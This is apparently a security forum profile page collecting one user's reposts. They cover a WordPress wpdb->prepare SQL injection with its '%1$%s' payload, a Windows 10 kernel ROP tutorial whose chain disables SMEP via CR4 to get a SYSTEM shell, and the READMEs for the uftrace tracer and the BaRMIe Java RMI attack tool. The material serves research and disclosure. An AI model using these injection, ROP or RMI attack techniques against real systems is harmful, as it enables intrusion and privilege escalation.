-
Posts
18789 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
Da, interesant, cuvinte mari... "We’re kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> Si daca aceste caractere sunt folosite in mod constient de developer? Modulul poate crea probleme. La urma urmei, nu prea ai cum sa "kill a bug class" cat timp limbajul iti permite acel "bug class". De exemplu, in Java, pentru a rula un proces de sistem cu "ProcessBuilder", trebuie sa ii dai ca parametri un List<String>, adica un vector unde primul element e comanda (e.g. ls, cat etc.) iar fiecare parametru urmator e un argument. Nu tine cont ca acel parametru contine spatii sau caractere speciale, e tratat ca un argument, ofera un fel de de "Prepared Statements" pentru executia de procese. "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won’t be able to use the stolen cookie, since he (often) can’t spoof the IP address of the user." -> Oare face doar """encryptie""", care e mult prea mult spus daca e vorba doar de adresa IP si de user-agent, sau verifica si adresa IP pe server? "This feature can’t be deployed on websites that already stored serialized objects (ie. in database)" -> Cred ca acesta e cel mai comun caz, din pacate. Abordarea este interesanta, instalezi un modul si ai scapat de probleme. Insa din motive logice, nu este si nu o sa fie niciodata de ajuns. Problema pleaca de mai sus, daca ii permiti unui user sa faca rahaturi, si nu il fortezi sa scrie cod sigur, o sa ai probleme.
-
The Humble Book Bundle: Hacking Reloaded presented by No Starch Press
Nytro replied to yukti's topic in Stiri securitate
Pay $1 (about €0.84) or more! Game Hacking Nick Cano The Car Hacker's Handbook Craig Smith The Smart Girl's Guide to Privacy Violet Blue Metasploit David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni 35% off Print Books from nostarch.com Pay $8 (about €6.69) or more to also unlock! Penetration Testing Georgia Weidman iOS Application Security David Thiel Android Security Internals Nikolay Elenkov The Book of PF Third Edition Peter N. M. Hansteen Practical Forensic Imaging Bruce Nikkel Pay $15 (about €12.54) or more to also unlock! The Book of PoC || GTFO Manul Laphroaig New Bestseller! Hacking Second Edition Jon Erickson The IDA Pro Book Second Edition Chris Eagle The Practice of Network Security Monitoring Richard Bejtlich Absolute OpenBSD Second Edition Michael W. Lucas Practical Packet Analysis Third Edition Chris Sanders -
slavco Aug 23 Wordpress SQLi There won’t be an intro, let us jump to the problem. This is the wordpress database abstraction prepare method code: public function prepare( $query, $args ) { if ( is_null( $query ) ) return; // This is not meant to be foolproof — but it will catch obviously incorrect usage. if ( strpos( $query, ‘%’ ) === false ) { _doing_it_wrong( ‘wpdb::prepare’, sprintf( __( ‘The query argument of %s must have a placeholder.’ ), ‘wpdb::prepare()’ ), ‘3.9.0’ ); } $args = func_get_args(); array_shift( $args ); // If args were passed as an array (as in vsprintf), move them up if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( ‘|(?<!%)%f|’ , ‘%F’, $query ); // Force floats to be locale unaware $query = preg_replace( ‘|(?<!%)%s|’, “‘%s’”, $query ); // quote the strings, avoiding escaped strings like %%s array_walk( $args, array( $this, ‘escape_by_ref’ ) ); return @vsprintf( $query, $args ); } From the code there are 2 interesting unsafe PHP practices that could guide towards huge vulnerabilities towards wordpress system. Before we jump to the SQLi case I’ll cover another issue. This issue is rised from following functionality: if ( isset( $args[0] ) && is_array($args[0]) ) $args = $args[0]; This means that if you have something like this: $wpdb->prepare($sql, $input_param1, $sanitized_param2, $sanitized_param3); then if you control the $input_param1 e.g. is part of the $input_param1 = $_REQUEST[“input”], this means that you can add your own values for the remaining parameters. This could mean nothing in some cases, but in some cases could easy lead to RCE having on mind nature and architecture of the wp itself. SQLi vulnerability In order to achieve SQLi in wp framework based on this prepare method we must know how core PHP function of this method works. It is vspritf which is in fact sprintf. This means that $query is format string and $args are parameters => directives in the format string define how the args will be placed in the format string e.g. query. Very, very important feature of sprintf are swapping arguments :) As extra there we have the following lines of code: $query = str_replace( “‘%s’”, ‘%s’, $query ); // in case someone mistakenly already singlequoted it $query = str_replace( ‘“%s”’, ‘%s’, $query ); // doublequote unquoting $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s e.g. will replace any %s into '%s'. From everything above we got following conclusion: If we are able to put into $query some string that will hold %1$%s then we can salute our SQLi => after prepare method is called then we will have an extra 'into query, because %1$%s will become %1$'%s' and after sprintf will become $arg[1]'. For now this is just theory and most probably improper usage of the prepare method, but if we find something interesting in the wp core than nobody could blame the lousy developers who don’t follow coding standards and recomendations from the API docs. Most interesting function is delete_metadata function and this function perform the desired actions from description above and when it is called with all of the 5 parameters set and $meta_value != “” and $delete_all = true; then we have our working POC e.g. if ( $delete_all ) { $value_clause = ‘’; if ( ‘’ !== $meta_value && null !== $meta_value && false !== $meta_value ) { $value_clause = $wpdb->prepare( “ AND meta_value = %s”, $meta_value ); } $object_ids = $wpdb->get_col( $wpdb->prepare( “SELECT $type_column FROM $table WHERE meta_key = %s $value_clause”, $meta_key ) ); } $value_clause will hold our input, but we need to be sure $meta_value already exists in the DB in order this SQLi vulnerable snippet is executed — remember this one. This delete_metadata function called with desired number of parameters is called in wp_delete_attachment function and this function is called in wp-admin/upload.php where $post_id_del input is value taken directly from $_REQUEST. Let us check the wp_delete_attachment function and its constraints before we reach the desired line e.g. delete_metadata( ‘post’, null, ‘_thumbnail_id’, $post_id, true );. The only obstacle that prevents this code to be executed is the following: if ( !$post = $wpdb->get_row( $wpdb->prepare(“SELECT * FROM $wpdb->posts WHERE ID = %d”, $post_id) ) ) return $post; but again due the nature of sprintf and %d directive we have bypass => attachment_post_id %1$%s your sql payload. Here I’ll stop for today (see you tomorrow with part 2: https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e), because in order authenticated user that have permission to create posts to execute successful SQLi attack need to insert the attachment_post_id %1$%s your sql payload as _thumbnail_id meta value. Fast fix for this use case (if you allow `author` or bigger role to your wp setup): At the top of the wp_delete_attachment function, right after global $wpdb; add the following line: $post_id = (int) $post_id; Impact for the wp eco system This unsafe method have quite huge impact towards wp eco system. There are affected plugins. Some of them already were informed and patched their issues, some of them put credits, some not. Another ones have pushed `silent` patches, but no one cares regarding safety of all. In the next writings of this topic I’ll release most common places/practices where issues like this ones occurs and will release the vulnerable core methods beside pointed one, so everyone can help this issue being solved. Responsible disclosure This approach is more than responsible disclosure and I’ll reffer to the paragraph for the impact and this H1 report https://hackerone.com/reports/179920 Promo If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only). Sursa: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
-
On WordPress Security and Contributing …and how neither really worked today. A sad story in two parts, where I’m rash, harsh and untactful. An explanation, a rant, a call for support, a call for action. You do not have to agree with me, I may be just an asshole and haven’t realized it yet Part 1: The %1$%s vulnerability This post will overview two issues that have hit me where it hurts with the recent WordPress 4.8.2 release. A handful of issues were addressed, among which a vulnerability in $wpdb->prepare which was fully disclosed 4 weeks ago here. But let’s start from the very beginning. A very long time ago a bad decision was made. wpdb->prepare was born which was based on sprintf functionality. The Codex states that the method provides “sprintf-like” functionality but only supports %d, %s and %f placeholders. Cool. As time went on, people figured out that numbered placeholders also work in this function and it was used at liberty, all over the place. Yoast SEO used, some Automattic internal code used, as well as a crapton of other instances of usage from GitHub’s search: https://github.com/search?q=wpdb->prepare+%1%24s&type=Code&utf8=✓ What they didn’t know is that numbered placeholders are not safe to use. First and foremost, numbered placeholders were not escaped. So $wpdb->prepare( 'SELECT * FROM wp_posts WHERE post_ID = %1$s', '1 OR 1 = 1' ); would actually yield a SQL injection, as the placeholder is not quoted it would result in SELECT * FROM wp_posts WHERE post_ID = 1 OR 1 = 1;. Classic. The developers who figured this out (because most of the SQL would actually break when using numbered placeholders without quotes) the usage was as safe as sprintf was. Then along comes a security researcher, discloses a vulnerability in $wpdb->prepare and states that if a developer makes a mistake and types %1$%s instead, then there’s potential for SQL injection. How? %1$%s gets transformed to %1$'%s' by $wpdb->prepare, because one of the features of the method is to unquote instances of "%s" and '%s' and then quote them again. What does sprintf do? %1$' get eaten up as an invalid placeholder, while %s' is left up for grabs and get transformed into whatever we wanted but only with a single quote at the end of it, breaking the SQL. An exploit would need: 1. A developer to make a typo and not notice is in the highlighted syntax of the code editor, 2. the attacker to have access to the input parameters. A hypothetical piece of code would be SELECT * FROM wp_users WHERE user_ID = %1$%s OR user_ID = %2$%s. With both inputs controlled by the attacker we can get the following if argument 1 is “1 OR 1 != ” and argument 2 is “injection”: SELECT * FROM wp_users WHERE user_ID = 1 OR 1 != ' OR user_ID = injection'. Which would simply return true for all users, because 1 is not equal to “OR user_ID = injection”, is it? So think of the chances of such code existing in the wild. Now think of the chances $wpdb->prepare is not used. Probably slim. At least but what we know of the vulnerability and how much has been disclosed. Four weeks later WordPress 4.8.2 enters the scene unexpectedly. And the patch it contains simply prevents anything other than %s, %f and %d from existing. Hell breaks lose. Sites with Yoast SEO installed on them stop functioning in the backend due to some code that relied on numbered placeholders. Needless to say, the aftermath of this decision will be felt for many months to come. Generated SQL with numbered placeholders is invalid SQL, a database error is thrown, a 500 error is returned in the browser. They call this “hardening”. A patch to “prevent plugins and themes from accidentally causing a vulnerability”. That’s funny. Why don’t we prevent stray quotes in the query? Or why don’t we prevent calls to $wpdb->query without a preceding call to $wpdb->prepare or unite them into one and break code that does not escape? But I’m very sure the security team have wrecked their heads for weeks and this was the decision that had to be made. Who stood behind the final decision, what was the reasoning, how will the aftermath be dealt with, nobody knows. Us risky developers can only comply. We can only wholeheartedly trust that the countless nights of sleep were lost pondering the better ways of solving the issue. And I’m not going to comment on how a zero-day was out in the public for 4 weeks and how nobody was made aware of the breaking change to $wpdb->preapare. I don’t really care at this point. Policy is policy, whoever got into trouble has already spoken (or will) about how nobody was notified about a used breaking change. It was undocumented, it’s ultimately the fault of who used it. Thus, I can’t call this a regression as developers relied on undocumented functionality. It’s not a a bug either. But wouldn’t it be great if $wpdb->prepare would actually support numbered placeholders? Seeing that it’s been used and will continue to be attempted to be used for years to come, I would say it’s a good idea. Why hasn’t anyone requested this before? Well, because it worked. Now, since it no longer works. A trac ticket requesting the feature is due, so that the community can figure out a way to introduce documented support for these popular numbered placeholders. Part 2: The feature request Meet ticket #41925 the first of a handful of duplicates that wanted numbered placeholders “back”. A discussion (or at least a monologue for now) to see how we can introduce their safe support in $wpdb->prepare, why the security team had to do what they did. I quickly threw a patch together to get the ball rolling as well as some test cases. In less than 12 hours a wontfix/close decision was made by one of the decision makers. Biased by some sort of undisclosed test cases that my patch failed to pass. Biased by what the team tried to do with the vulnerability. Biased by the internal misfortunes and hurdles they were met with while trying to solve it. Biased by the fact that numbered placeholders were not supported to begin with. Just like that. A wontfix/closed stamp. Where’s the discussion? Where’s the test cases that fail? Is it not a valid feature request? We’ve had more absurd ones hang open for years. Why is a valid feature request, all of a sudden stamped in way similar to some of the most silly single-line feature requests out there? Why should a though-through, code-heavy and well-versed (at least in my opinion, but hey, I’m biased) ticket be carrying the stigma of a wontfix/closed? Discouraging people from actively participating in exploring the problem space and finding a solution because one of the higher-ups said “No way, Jose?” A disrespectful spit in the face is what I felt. After spending over 8 hours trying to understand what the issue is, how we can begin to address it? Shut down. Just like that? And an hour after the feature request is closed as wontfix Slack has this weekly or monthly (I don’t know) new contributors day, where developers and designers are encouraged to work on issues, etc. Oh, the freaking irony! If this is not hypocrisy, I don’t know what is. Again. It’s a feature request. It’s related to a vulnerability. In order to implement a good solution we have to dissect the vulnerability, there’s no other way, whether you like it or not. We have to write hundreds of test cases, try and break the proposed solutions. But a wontfix/closed? “Why bother?”, would say a passerby. “Oh, but you can still discuss and comment on it. And you can even reopen it.” some would say. After all the “encouragement”? After a core committer does an action that is literally equal to saying “We won’t fix this, no point in trying. Shoo away, go home, kids.” when effort and determination to get things going is clearly shown? Such disregard is pretty offensive and depressing. After speaking to several other people from the Russian community, I’ve been told that this behavior not unheard of. The almighty “No” of the higher ups, just because. The community is sometimes met with hurdles upon hurdles, a contributing environment that sometimes verges on the disgusting. Is this really the WordPress open-source project? Part 3: On safety nets vs. bad code. Sursa: https://codeseekah.com/2017/09/21/on-wordpress-security-and-contributing/
-
Return Oriented Programming Tutorial Hi in this tutorial we will go throw a very basic way of creating a ROP (Return Oriented Programming) Chain in order to bypass SMEP and get kernel mode execution on latest windows installation despite microsoft mitigation's. Setup: This tutorial is meant to be an active tutorial meaning that its best you will download the binary provided for the tutorial and experiment on your own with the main idea's presented. So this is what you will need in order to run the full tutorial by your own: HEVD: download from here. Windows 10 RS3 Here. WinDbg & Symbols: * kd. Symbols. Hyper-V: * How To unable hyper-v. Setup File sharing beetwin the machine and the host:* Setup File Sharing.. My Debug Binary: * download link.. Introduction: Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data execution Prevention) & SMEP. if you would like to read more about smep you can check out the link at the main README.md file of this project. the main charicteristic of this method is that instead of running pure shell code directlly from a user supplied buffer we instead use small snipets of code called gadgets. say for example i want to place 0x1FA5 in rsp, useally i will simply write in my shellcode: mov rsp, 0x1FA5 instead when using rop we will try to find some address in memory (this can be a dll an exe image or the kernel image), that will do exactly the same. and instead of writing it in the payload we will place that memory address of that function to be executed instead. so lets say i know that at a certain Offset from the base address of some dll say hal.dll there is a good instruction, then assuming that i can get code execution if i will pass the address of that function to the exploit target on runtime it will get executed. when building a rop chain the chain will be computed from many small gagdets like this one, you can think a bout it like shellcoding with snippets from other executable memory. here is a little snippent to visualize this: so in that picture as an example we will send to our exploit target a buffer that contains: hal+0x6bf0 followed by hal+0x668e .. and so on. You may ask yourself: why would we want to do that? why not simply write the shellcode as is? Well if you can simply write the shellcode as is then it is far easy to do that, but as mentioned b4 it may not allways be possible. so lets say a little about smep. smep is a security massure that uses hardware features in order to protect the endpoint from exploits such as kernel exploits. the main idea is to mark eache page allocated in the memory as eather kernel address space (K-executable/r/w) or user space. this way when the kernel executes code that code address is being checked (if the hardware offers that possiblety) if its a user space address or kernel mode address. if it was found that the code is marked as user space the kernel will stop the execution flow with a critical error, bsod. so if we will simply try to exploit a stack overflow like we did on windows 7, we will get this outcome: so the main idea in rop is to make the execution flow throw a kernel executable address that can pass the check until we can execute our own payload. enough talk lets debug!!! assuming that you have set up the environment as stated above, and you have a working machine, then open an administrator command, and type as follow: b4 running anything hit break on the debugger (open debug window and click break), next open view -> registers. scoll all the way down and the resault should be: next up type g and hit enter the machine should be running as normal, run the sample exe that i have provided, you should get a break point and this output should go on the debugger: as you can see this break point is different from the one we hit b4. first take a look at the address that triggered the break point: at the break point b4 we hit : 0xfffff80391595050 cc int 3 and now we got: Break instruction exception - code 0x80000003 (first chance) 0x0000017039f00046 cc int 3 as you can see the first address is a kernel space address and the second a user address. this is becouse i have place xcc in my shellcode. next up open the registers again the outcome should be as follows: you may ask yourself, why is cr4 register changed and how is it that we do not get the bsod msg as b4? well becouse the binary build a rop chain as follows: // To better align the buffer, // it is usefull to declare a // memory structure, other-wise you will get holes // in the buffer and end up with an access violation. typedef struct _RopChain { PUCHAR HvlEndSystemInterrupt; PUCHAR Var; PUCHAR KiEnableXSave; PUCHAR payload; // PUCHAR deviceCallBack; } ROPCHAIN, *PROPCHAIN; // Pack The buffer as: ROPCHAIN Chain; // nt!HvlEndSystemInterrupt+0x1e --> Pop Rcx; Retn; Chain.HvlEndSystemInterrupt = Ntos + 0x17d970; // kd> r cr4 // ...1506f8 Chain.Var = (PUCHAR)0x506f8; // nt!KiEnableXSave+0x7472 --> Mov Cr4, Rcx; Retn; Chain.KiEnableXSave = Ntos + 0x434a33; meaning that we have sent the vuln driver a stack overflow buffer, but instead of supplying our shell code we have given the driver the buffer above that is first composed of: Pop Rcx <-- kernel mode address Retn 0x506f8 Mov Cr4, Rcx Retn (ShellCodeAddress) So basically we have "jump" to our shellcode from other kernel mode address's so we did not got the bsod, simply cuz we have given the kernel a kernl-mode address so we passed the check, next up we flipped the bit on the cr4 register value to trick the system that smep is not supported on the firmware. we can see that by running kv command. you can see the kernel mode address on the stack call and can see the execution flow, as well as the nop's we have placed in our buffer. hit g again and you should see the below outcome: as you can see we have hit access violation, this is becouse in this demo i did not fix the return address pointer, so we can do this together, hit r on the debugger: as you can see the stack is a mess & the registers as well, the return address try's to read a pointer from rax, that is pointing to zero address, so we got access violation. so like we had to "jump" to our shell code to avoid SMEP, we need to jump back to a reasonable state, but how can we know what is a good address to jump back to? when we looked at the stack b4 we could see the execution flow, So 0x00007fffb29013aa the lowest address called the ioctl then we got to our shellcode from the overflow (the nop's), a good thing to do would be to make a return to one of our original call's on the stack to resume execution. if we take a look at 0x00007fffb29013aa we can see its marked as UREV user executable, so if we will jump to that address we will be in the same situation as b4 (bsod) so we need to find another place on the stack to jump to. lets see about nt!IofCallDriver+0x59 that is on the stack as well, we can even see what code is contained at this location running the below command: So we can see that this function simply returns back to the caller and is also KREV kernel exec. so it will be a good choise. while i was finding gadgets i was doing exactly the same, looking for KREV address that contain good code for me like mov cr4, rcx. with the 'u' command on the kd. ok, but how can we jump to that address? open up the registers again and copy the first instruction address in the output of kd> u nt!IofCallDriver+0x59 as follows: place it in rip (in view registers..) now hit g again. back in box you should have a command running as local system. So this is the end of the tutorial, i hope it will be usefull, now you know a bit more about ROP, and got some basic tools to build your own rop chain. my example code can be found here: C0de. and i challenge you to fix the return address programmatically! for more information please go to the main readme of this project and go to the links provided (how to find gadgets rop smep.. etc..) Sursa: https://github.com/akayn/demos/tree/master/Tutorials
-
- 1
-
-
uftrace The uftrace tool is to trace and analyze execution of a program written in C/C++. It was heavily inspired by the ftrace framework of the Linux kernel (especially function graph tracer) and supports userspace programs. It supports various kind of commands and filters to help analysis of the program execution and performance. Homepage: https://github.com/namhyung/uftrace Tutorial: https://github.com/namhyung/uftrace/wiki/Tutorial Chat: https://gitter.im/uftrace/uftrace Features It traces each function in the executable and shows time duration. It can also trace external library calls - but only entry and exit are supported and cannot trace internal function calls in the library call unless the library itself built with profiling enabled. It can show detailed execution flow at function level, and report which function has the highest overhead. And it also shows various information related the execution environment. You can setup filters to exclude or include specific functions when tracing. In addition, it can save and show function arguments and return value. It supports multi-process and/or multi-threaded applications. With root privilege, it can also trace kernel functions as well( with -k option) if the system enables the function graph tracer in the kernel (CONFIG_FUNCTION_GRAPH_TRACER=y). How to use uftrace The uftrace command has following subcommands: record : runs a program and saves the trace data replay : shows program execution in the trace data report : shows performance statistics in the trace data live : does record and replay in a row (default) info : shows system and program info in the trace data dump : shows low-level trace data recv : saves the trace data from network graph : shows function call graph in the trace data script : runs a script for recorded trace data You can use -? or --help option to see available commands and options. $ uftrace Usage: uftrace [OPTION...] [record|replay|live|report|info|dump|recv|graph|script] [<program>] Try `uftrace --help' or `uftrace --usage' for more information. If omitted, it defaults to the live command which is almost same as running record and replay subcommand in a row (but does not record the trace info to files). For recording, the executable should be compiled with -pg (or -finstrument-functions) option which generates profiling code (calling mcount or __cyg_profile_func_enter/exit) for each function. $ uftrace tests/t-abc # DURATION TID FUNCTION 16.134 us [ 1892] | __monstartup(); 223.736 us [ 1892] | __cxa_atexit(); [ 1892] | main() { [ 1892] | a() { [ 1892] | b() { [ 1892] | c() { 2.579 us [ 1892] | getpid(); 3.739 us [ 1892] | } /* c */ 4.376 us [ 1892] | } /* b */ 4.962 us [ 1892] | } /* a */ 5.769 us [ 1892] | } /* main */ For more analysis, you'd be better recording it first so that it can run analysis commands like replay, report, graph, dump and/or info multiple times. $ uftrace record tests/t-abc It'll create uftrace.data directory that contains trace data files. Other analysis commands expect the directory exists in the current directory, but one can use another using -d option. The replay command shows execution information like above. As you can see, the t-abc is a very simple program merely calls a, b and c functions. In the c function it called getpid() which is a library function implemented in the C library (glibc) on normal systems - the same goes to __cxa_atexit(). Users can use various filter options to limit functions it records/prints. The depth filter (-D option) is to omit functions under the given call depth. The time filter (-t option) is to omit functions running less than the given time. And the function filters (-F and -N options) are to show/hide functions under the given function. The -k option enables to trace kernel functions as well (needs root access). With the classic hello world program, the output would look like below (Note, I changed it to use fprintf() with stderr rather than the plain printf() to make it invoke system call directly): $ sudo uftrace -k hello Hello world # DURATION TID FUNCTION 1.365 us [21901] | __monstartup(); 0.951 us [21901] | __cxa_atexit(); [21901] | main() { [21901] | fprintf() { 3.569 us [21901] | __do_page_fault(); 10.127 us [21901] | sys_write(); 20.103 us [21901] | } /* fprintf */ 21.286 us [21901] | } /* main */ You can see the page fault handler and the write syscall handler were called inside the fprintf() call. Also it can record and show function arguments and return value with -A and -R options respectively. The following example records first argument and return value of 'fib' (fibonacci number) function. $ uftrace record -A fib@arg1 -R fib@retval fibonacci 5 $ uftrace replay # DURATION TID FUNCTION 2.853 us [22080] | __monstartup(); 2.194 us [22080] | __cxa_atexit(); [22080] | main() { 2.706 us [22080] | atoi(); [22080] | fib(5) { [22080] | fib(4) { [22080] | fib(3) { 7.473 us [22080] | fib(2) = 1; 0.419 us [22080] | fib(1) = 1; 11.452 us [22080] | } = 2; /* fib */ 0.460 us [22080] | fib(2) = 1; 13.823 us [22080] | } = 3; /* fib */ [22080] | fib(3) { 0.424 us [22080] | fib(2) = 1; 0.437 us [22080] | fib(1) = 1; 2.860 us [22080] | } = 2; /* fib */ 19.600 us [22080] | } = 5; /* fib */ 25.024 us [22080] | } /* main */ The report command lets you know which function spends the longest time including its children (total time). $ uftrace report Total time Self time Calls Function ========== ========== ========== ==================================== 25.024 us 2.718 us 1 main 19.600 us 19.600 us 9 fib 2.853 us 2.853 us 1 __monstartup 2.706 us 2.706 us 1 atoi 2.194 us 2.194 us 1 __cxa_atexit The graph command shows function call graph of given function. In the above example, function graph of function 'main' looks like below: $ uftrace graph main # # function graph for 'main' (session: 8823ea321c31e531) # backtrace ================================ backtrace #0: hit 1, time 25.024 us [0] main (0x40066b) calling functions ================================ 25.024 us : (1) main 2.706 us : +-(1) atoi : | 19.600 us : +-(1) fib 16.683 us : (2) fib 12.773 us : (4) fib 7.892 us : (2) fib The dump command shows raw output of each trace record. You can see the result in the chrome browser, once the data is processed with uftrace dump --chrome. Below is a trace of clang (LLVM) compiling a small C++ template metaprogram. The info command shows system and program information when recorded. $ uftrace info # system information # ================== # program version : uftrace v0.6 # recorded on : Tue May 24 11:21:59 2016 # cmdline : uftrace record tests/t-abc # cpu info : Intel(R) Core(TM) i7-3930K CPU @ 3.20GHz # number of cpus : 12 / 12 (online / possible) # memory info : 20.1 / 23.5 GB (free / total) # system load : 0.00 / 0.06 / 0.06 (1 / 5 / 15 min) # kernel version : Linux 4.5.4-1-ARCH # hostname : sejong # distro : "Arch Linux" # # process information # =================== # number of tasks : 1 # task list : 5098 # exe image : /home/namhyung/project/uftrace/tests/t-abc # build id : a3c50d25f7dd98dab68e94ef0f215edb06e98434 # exit status : exited with code: 0 # elapsed time : 0.003219479 sec # cpu time : 0.000 / 0.003 sec (sys / user) # context switch : 1 / 1 (voluntary / involuntary) # max rss : 3072 KB # page fault : 0 / 172 (major / minor) # disk iops : 0 / 24 (read / write) How to install uftrace The uftrace is written in C and tried to minimize external dependencies. Currently it requires libelf in elfutils package to build, and there're some more optional dependencies. Once you installed required software(s) on your system, it can be built and installed like following: $ make $ sudo make install For more advanced setup, please refer INSTALL.md file. Limitations It can trace a native C/C++ application on Linux. It cannot trace already running process. It cannot be used for system-wide tracing. It supports x86_64 and ARM (v6 or later) and AArch64 for now. License The uftrace program is released under GPL v2. See COPYING file for details. Sursa: https://github.com/namhyung/uftrace
-
- 1
-
-
BaRMIe BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls, however RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, however even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64-bits/9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network. Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar Disclaimer BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program. Usage Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information. $ java -jar BaRMIe.jar ▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████ ▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀ ▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███ ▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄ ░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒ ░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░ ▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ v1.0 Java RMI enumeration tool. Written by Nicky Bloor (@NickstaDB) Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Usage: BaRMIe -enum [options] [host] [port] Enumerate RMI services on the given endpoint(s). Note: if -enum is not specified, this is the default mode. BaRMIe -attack [options] [host] [port] Enumerate and attack the given target(s). Options: --threads The number of threads to use for enumeration (default 10). --timeout The timeout for blocking socket operations (default 5,000ms). --targets A file containing targets to scan. The file should contain a single host or space-separated host and port pair per line. Alternatively, all nmap output formats are supported, BaRMIe will parse nmap output for port 1099, 'rmiregistry', or 'Java RMI' services to target. Note: [host] [port] not supported when --targets is used. Reliability: A +/- system is used to indicate attack reliability as follows: [+ ]: Indicates an application-specific attack [- ]: Indicates a JRE attack [ + ]: Attack insecure methods (such as 'writeFile' without auth) [ - ]: Attack Java deserialization (i.e. Object parameters) [ +]: Does not require non-default dependencies [ -]: Non-default dependencies are required Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output. No Vulnerable Targets Identified? Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files. Attack Types BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door. 1. Attacking Insecure Methods The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this: //Get a reference to the remote RMI registry service Registry reg = LocateRegistry.getRegistry(targetHost, targetPort); //Get a reference to the target RMI object Foo bar = (Foo)reg.lookup(objectName); //Call the remote executeCommand() method bar.executeCommand(cmd); 2. Deserialization via Object-type Paraeters Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below: public void setOption(String name, Object value); public void addAll(List values); 3. Deserialization via Illegal Method Invocation Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below: public void setName(String name); public Long add(Integer i1, Integer i2); public void sum(int[] values); The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them. Sursa: https://github.com/NickstaDB/BaRMIe
-
- 2
-
-
